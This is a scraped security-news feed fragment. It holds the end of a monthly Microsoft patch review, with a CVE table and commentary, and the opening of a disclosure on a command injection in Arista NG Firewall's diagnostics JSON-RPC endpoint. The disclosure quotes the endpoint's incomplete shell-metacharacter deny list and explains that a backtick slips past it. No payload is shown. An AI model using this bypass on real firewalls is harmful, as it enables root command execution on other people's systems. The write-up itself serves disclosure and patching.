  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20846"><span><span> </span>CVE-2026-20846<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GDI+ Denial of Service Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21523"><span><span> </span>CVE-2026-21523<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Code Remote
  Code Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21518"><span><span> </span>CVE-2026-21518<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Code
  Security Feature Bypass Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21257"><span><span> </span>CVE-2026-21257<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Elevation
  of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21256"><span><span> </span>CVE-2026-21256<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Remote Code
  Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21516"><span><span> </span>CVE-2026-21516<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot for Jetbrains Remote Code
  Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21253"><span><span> </span>CVE-2026-21253<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Mailslot File System Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21537"><span><span> </span>CVE-2026-21537 †</span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Defender for Endpoint Linux
  Extension Remote Code Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21259"><span><span> </span>CVE-2026-21259<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21258"><span><span> </span>CVE-2026-21258<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21261"><span><span> </span>CVE-2026-21261<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21527"><span><span> </span>CVE-2026-21527<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Exchange Server Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21260"><span><span> </span>CVE-2026-21260<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Outlook Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21229"><span><span> </span>CVE-2026-21229<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Power BI Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21236"><span><span> </span>CVE-2026-21236<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21238"><span><span> </span>CVE-2026-21238<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21241"><span><span> </span>CVE-2026-21241<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21517"><span><span> </span>CVE-2026-21517<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows App for Mac Installer Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21234"><span><span> </span>CVE-2026-21234<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Connected Devices Platform Service
  Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21235"><span><span> </span>CVE-2026-21235<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Graphics Component Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21246"><span><span> </span>CVE-2026-21246<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Graphics Component Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21232"><span><span> </span>CVE-2026-21232<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21240"><span><span> </span>CVE-2026-21240<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21250"><span><span> </span>CVE-2026-21250<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21244"><span><span> </span>CVE-2026-21244<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21247"><span><span> </span>CVE-2026-21247<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21248"><span><span> </span>CVE-2026-21248<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21255"><span><span> </span>CVE-2026-21255<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21231"><span><span> </span>CVE-2026-21231<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21239"><span><span> </span>CVE-2026-21239<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21245"><span><span> </span>CVE-2026-21245<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21222"><span><span> </span>CVE-2026-21222<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21243"><span><span> </span>CVE-2026-21243<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Lightweight Directory Access
  Protocol (LDAP) Denial of Service Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841"><span><span> </span>CVE-2026-20841<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Notepad App Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21249"><span><span> </span>CVE-2026-21249<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows NTLM Spoofing Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">3.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21508"><span><span> </span>CVE-2026-21508<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Storage Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21237"><span><span> </span>CVE-2026-21237<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Subsystem for Linux Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21242"><span><span> </span>CVE-2026-21242<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Subsystem for Linux Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1861"><span><span> </span>CVE-2026-1861 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Chromium: CVE-2026-1861 Heap buffer overflow
  in libvpx<span> </span></td>
  <td class="xl67"><span> </span>High</td>
  <td class="xl65">N/A</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1862"><span><span> </span>CVE-2026-1862 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Chromium: CVE-2026-1862 Type Confusion in
  V8<span> </span></td>
  <td class="xl67"><span> </span>High</td>
  <td class="xl65">N/A</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0391"><span><span> </span>CVE-2026-0391<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Edge (Chromium-based) for Android
  Spoofing Vulnerability<span> </span></td>
  <td class="xl68"><span> </span>Moderate<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="151"></td>
  <td width="263"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="95"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Moving on to the Critical-rated bugs, the patch for Azure Front Door sounds frightening, but Microsoft has already fixed the bug and is just now documenting it. That’s also true for the bugs in Azure Arc and Azure Function. There are two Critical-rated bugs in the ACI Confidential Containers. The first allows a container escape while the second discloses secret tokens and keys. Either way, you’ll want to handle those quickly.</p><p class="">Taking a look at the other code execution vulnerabilities in this month’s release, we start with a frightening looking bug in Azure SDK for Python that has the highest CVSS this month of 9.8. A remote, unauthenticated attacker code gain code execution on an affected system via a maliciously crafted continuation token. It’s not clear why this isn’t rated Critical, but I would treat it as such. The three bugs in Hyper-V are actually local open-and-own bugs that require a user to open a malicious file on an affected system. That’s also true for the bug in Notepad. The bug in Power BI is confusing, because Microsoft says it requires authentication and could lead to an attacker running code as an authenticated user. There’s the poorly named “Azure Local Remote Code Execution Vulnerability”, but it requires a machine-in-the-middle (MitM) to exploit. The bug in Defender for Endpoint Linux is restricted to local subnets, but you’ll need to enable auto provisioning to get the patch. The final code execution bugs addressed this month are in GitHub Copilot. Two are command injections and the other is a Time-of-check time-of-use (toctou) race condition, but both could end up in code execution on affected systems.</p><p class="">Patches for Elevation of Privilege (EoP) bugs make up nearly 50% of this release, but most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges. There are only two of note. The first is a command injection bug in GitHub Copilot that leads to executing code at the level of the targeted application. The second is a bug in a kernel that leads to SYSTEM but could also be used for a sandbox escape.</p><p class="">There’s a unusually high number of spoofing bugs in this month’s release, and the ones for Outlook are the most troubling. First, the Preview Pane is an attack vector. Secondly, the bugs could be used to relay NTLM credentials via just an email, which could result in credential disclosure. And you’ll need multiple patches to fully address these bugs. At least they can be applied in any order.  There’s a UI misrepresentation bug in Exchange Server that could allow an attacker to either view some sensitive information or “make changes to disclosed information”. At what point does data become disclosed? That odd phrasing makes me think they are using AI to right some of their descriptions. The phrasing also appears in the patch for NTLM. That bug is triggered by opening a specially crafted Office doc, and while they explicitly say it could be used to relay NTLM creds, it sure seems that way. The patch for .NET and Visual Studio fixes a bug that allows attackers to bypass header validation, resulting in the service accepting a message it should reject. Finally, the bug in Azure HDInsight is really just a cross-site scripting (XSS) bug. The caveat here is that you need to restart Ambari server in both of the head nodes to have this fix updated. There is also an XSS in Azure Devops Server, but at least it is labelled as such.</p><p class="">There are a couple of additional security feature bypass bugs to discuss. The first is in Hyper-V and bypasses the Virtualization-based Security feature. The other is in GitHub Copilot and Visual Studio Code. It’s another command injection, but this one can be used to bypass authentication. Neat.</p><p class="">Looking at the remaining info disclosure bugs getting patched this month, most simply result in info leaks consisting of unspecified memory contents or memory addresses. The exception is the bug in Azure IoT Explorer. This bug could be used to view the contents of the target user’s local file system.</p><p class="">We end this month’s release with two DoS bugs: one in LDAP and one in GDI+. Neither descriptions from Microsoft provide any usable information.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">I plan on being back home for the March release but wherever I’m at, you can rest assured that March 10, I’ll be here to provide my assessment of the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-6978: Arbitrary Code Execution in the Arista NG Firewall]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by Gereon Huppertz and reported through the Tre...]]></description>
<link>https://tsecurity.de/de/3694475/it-security-nachrichten/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694475/it-security-nachrichten/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by</em> <em>Gereon Huppertz and reported through the TrendAI Zero Day Initiative (ZDI) program. Successful exploitation could result in arbitrary command execution under the security context of the root user. The following is a portion of their write-up covering CVE-2025-6798, with a few minimal modifications.</em></p>





















  
  




  



  <hr>
  
    
    



  




  <p class="">A command injection vulnerability has been reported in Arista NG Firewall. The vulnerability is due to improper validation of user data in the diagnostics component.</p><p class="">A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the root user. </p><p class=""><strong>The Vulnerability</strong></p><p class="">Arista NG Firewall is an open-source firewall appliance. It was originally developed under the name Untangle. Some features of Arista Firewall include spam blocking, bandwidth control, and IPS, etc. NG Firewall can be managed through a web user interface, or a JSON-RPC API using HTTP.</p><p class="">HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents a space character. Parameters can be passed from the client to the server as name-value pairs in either the Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a simple HTTP request passing a parameter named “param” with value “1”, using the GET method might look like:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">A corresponding HTTP request using the POST method might look like:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If there is more than one parameter/value pair, they are encoded as '&amp;'-delimited name=value pairs:</p>
<p>          <code>var1=value1&amp;var2=value2&amp;var3=value3...</code></p>
<p>The component relevant to this report is the JSON-RPC endpoint. A JSON object has the following syntax:</p>




  <p class="">•            An object is enclosed in curly braces {}.<br>•            An object consists of zero or more items delimited by a comma (",") character.<br>•            An item consists of a key and a value. A key is delimited from its value by a colon (":") character.<br>•            A key must be a string (enclosed in quotes).<br>•            A value must be a valid type. Valid types include string, number, JSON object, array, Boolean, or null.<br>•            An array is an object enclosed in square braces []. An array consists of zero or more string, number, JSON object, array, Boolean or null type-objects delimited by a comma (",") character.</p><p class="">An example JSON object is as follows:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>The following is an example of a JSON-RPC request to the <code>runTroubleshooting()</code> method that is relevant to this report:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>A command injection vulnerability has been reported in Arista NG Firewall. The vulnerability is due to improper validation of user data that is used in a command line. The <code>runTroubleshooting()</code> method of the class <code>NetworkManagerImpl</code> will be used to handle JSON-RPC requests to the <code>runTroubleshooting</code> method. The command parameter passed to the method will be the first element in the <code>params</code> JSON array in the body of the request. This value must be one of the strings in the <code>TroubleshootingCommands enum</code> defined in the <code>NetworkManager</code> class. The second parameter of the method will contain additional arguments passed to the JSON-RPC call.</p>
<p>The method will first iterate through each of the additional arguments and combine each key value pair into a single string, separated by a "=" character that will later be used as an environment variable. Next, a switch case statement is used to ensure the provided command is one of the values in <code>TroubleshootingCommands</code>. Each command value will be processed using the same code. </p>
<p>The method will next iterate through each environment variable, and inspect it for the following common command injection strings:</p>
<p>          <code>; &amp; | &gt; $(</code></p>
<p>If any are found, the request will be rejected, and an exception is thrown. If each environment variable is valid, the method <code>execEvil()</code> is called to create and execute a command line for the network-troubleshooting.sh script, with the environment variables passed as a parameter. The <code>execEvil()</code> method in turn will call <code>Runtime.getRuntime().exec()</code> to run the script, with the second parameter passing the environment variables that will be used by the script. Each command value will have a function in network-troubleshooting.sh, such as <code>run_dns()</code> for the “DNS” command value. Each function will follow a similar structure, by creating a CMD string using the environment variables passed by <code>exec()</code> and then calling eval to execute it.</p>
<p>However, the values of the parameters passed to the <code>runTroubleshooting</code> JSON-RPC method are not completely sanitized before it is used in the command line. While the parameters passed to the endpoint are inspected for some shell metacharacters, the list is incomplete. For example, the backtick character (`) is not included in the check and may be used to inject a command.</p>
<p>For example:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

